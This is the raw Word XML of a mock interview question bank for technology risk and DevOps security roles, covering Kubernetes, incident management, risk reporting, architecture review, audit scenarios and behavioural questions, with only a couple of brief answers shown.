      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/DevOps Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. What is an SBOM?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/DevOps Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Explain image signing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/DevOps Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is Image Signing?</w:t>
        <w:br/>
        <w:t>Image Signing is the process of digitally signing a container image (Docker image) to verify:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. What is runtime security?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/DevOps Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. What are the risks of Helm charts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/DevOps Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. What are Kubernetes RBAC risks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/DevOps Risk</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. What are the risks of privileged containers?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/DevOps Risk</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 33 - Incident Management Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Describe your incident management process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Incident Management</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What is the difference between incident, problem, and risk?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Incident Management</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How do you perform Root Cause Analysis?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Incident Management</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. What is a postmortem?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Incident Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A postmortem is a structured review after an incident. It documents what happened, impact, timeline, root causes, what went well, what did not, and action items. A good postmortem is blameless, evidence-based, and focused on preventing recurrence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Explain the 5 Whys technique.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Incident Management</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. What is a near miss?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Incident Management</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How do you prevent recurring incidents?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Incident Management</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. What KPIs do you track?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Incident Management</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. What is Mean Time to Detect (MTTD)?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Incident Management</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. What is Mean Time to Recover (MTTR)?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Incident Management</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 34 - Risk Monitoring and Reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. What risk metrics do you monitor?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring/Reporting</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What should a risk dashboard include?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring/Reporting</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How do you report risks to leadership?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring/Reporting</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Explain Key Risk Indicators (KRIs).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring/Reporting</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. What is the difference between KRIs and KPIs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring/Reporting</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How do you monitor cloud security posture?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring/Reporting</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. What SIEM tools have you used?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring/Reporting</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How do you prioritize vulnerabilities?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring/Reporting</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. What is risk trending?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring/Reporting</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How do you communicate business impact?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring/Reporting</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 35 - Architecture Review Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. What do you review before approving an architecture?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Architecture Review</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. How do you evaluate third-party risk?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Architecture Review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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. What questions do you ask during architecture reviews?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Architecture Review</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. How do you identify single points of failure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Architecture Review</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Explain High Availability from a risk perspective.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Architecture Review</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Explain Disaster Recovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Architecture Review</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. What is the difference between RTO and RPO?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Architecture Review</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. What is Business Continuity Planning?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Architecture Review</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. Explain Zero Trust Architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Architecture Review</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. What are common architecture risks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Architecture Review</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 36 - Audit and Compliance Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. An auditor finds that production access is shared among developers. What do you do?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Audit/Compliance Scenarios</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Terraform state contains database passwords. How would you fix this?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Audit/Compliance Scenarios</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Jenkins stores credentials in plain text. What actions would you take?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Audit/Compliance Scenarios</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Kubernetes dashboard is publicly accessible. What risks exist?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Audit/Compliance Scenarios</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. A developer requests Owner access in GCP. Would you approve it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Audit/Compliance Scenarios</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Your audit finds that 50 VMs have no patching process. What is your response?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Audit/Compliance Scenarios</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Cloud logging has been disabled. Why is this a risk?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Audit/Compliance Scenarios</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. A critical vulnerability is found in production. What steps would you follow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Audit/Compliance Scenarios</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. An application stores customer data without encryption. What are the risks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Audit/Compliance Scenarios</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. Public storage buckets are discovered. How would you respond?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Audit/Compliance Scenarios</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 37 - Technology Risk Behavioural Questions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Tell me about a difficult technology risk you managed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Leadership/Behavioural</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Describe a situation where engineering disagreed with your recommendation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Leadership/Behavioural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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How do you influence stakeholders without authority?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Leadership/Behavioural</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Tell me about an audit that did not go well.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Leadership/Behavioural</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Describe a major production incident.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Leadership/Behavioural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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How do you balance security and delivery speed?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Leadership/Behavioural</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Tell me about a time you identified a hidden risk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Leadership/Behavioural</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Describe a risk that eventually became an incident.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Leadership/Behavioural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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How do you handle conflicting priorities?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Leadership/Behavioural</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. Why do you want to move into Technology Risk?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Leadership/Behavioural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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 38 - GCP DevOps Risk Tailored Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
